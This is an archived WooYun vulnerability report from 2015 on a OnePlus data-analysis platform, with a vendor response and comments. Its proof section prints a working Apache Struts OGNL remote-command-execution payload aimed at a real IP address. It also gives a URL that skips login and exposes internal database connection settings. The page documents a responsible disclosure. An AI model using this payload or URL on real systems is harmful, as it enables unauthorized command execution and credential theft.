当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096120

漏洞标题:一加某平台多个漏洞+敏感信息泄露

相关厂商:oneplus.cn

漏洞作者: 7z1

提交时间:2015-02-07 09:35

修复时间:2015-03-24 09:36

公开时间:2015-03-24 09:36

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-07: 细节已通知厂商并且等待厂商处理中
2015-02-07: 厂商已经确认,细节仅向厂商公开
2015-02-17: 细节向核心白帽子及相关领域专家公开
2015-02-27: 细节向普通白帽子公开
2015-03-09: 细节向实习白帽子公开
2015-03-24: 细节向公众公开

简要描述:

一加我又来了 上次送木制收纳盒,这次送什么捏 ? hoho (^.^)
顺便祝各位白帽子黑帽子新年快乐~

详细说明:

一加数据分析平台存在多个漏洞:

1.Apache struts 远程命令执行
2.脆弱的访问验证导致敏感信息泄露


关于 一加数据分析平台 后台登陆验证居然只做了强制跳转……  ̄□ ̄||

漏洞证明:

Apache struts 远程命令执行

http://125.88.171.175:8080/doAction.action
POST DATA:
debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'dir'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()


struts.png


脆弱的访问验证导致敏感信息泄露,泄露了内网多个数据库连接信息,感觉差不多了~

test url:
http://125.88.171.175:8080/jobConf/jobConf/index.jsp?rp_id=0_7_1&rp_pid=0_7&rp_name=t_dim_db


访问验证脆弱.png


db1.png


db2.png


oneplus.png


修复方案:

版权声明:转载请注明来源 7z1@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-07 12:20

厂商回复:

非常感谢您的报告,问题已着手处理,感谢对一加业务安全的关注。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-07 10:44 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @7z1 好眼力,咋找到的?C段?

  2. 2015-02-07 11:03 | 7z1 ( 实习白帽子 | Rank:94 漏洞数:14 | 黑客:探险家、网络中的幽灵、用技术捍卫正...)

    @BMa 恩

  3. 2015-02-07 11:13 | 7z1 ( 实习白帽子 | Rank:94 漏洞数:14 | 黑客:探险家、网络中的幽灵、用技术捍卫正...)

    昨夜搞得太晚,提交之后发现口子越撕越大,但是乌云提交漏洞没法编辑,一觉醒来就审核了 ò.ó!

  4. 2015-02-07 11:15 | 7z1 ( 实习白帽子 | Rank:94 漏洞数:14 | 黑客:探险家、网络中的幽灵、用技术捍卫正...)

    一系列的问题造成的威胁挺大的……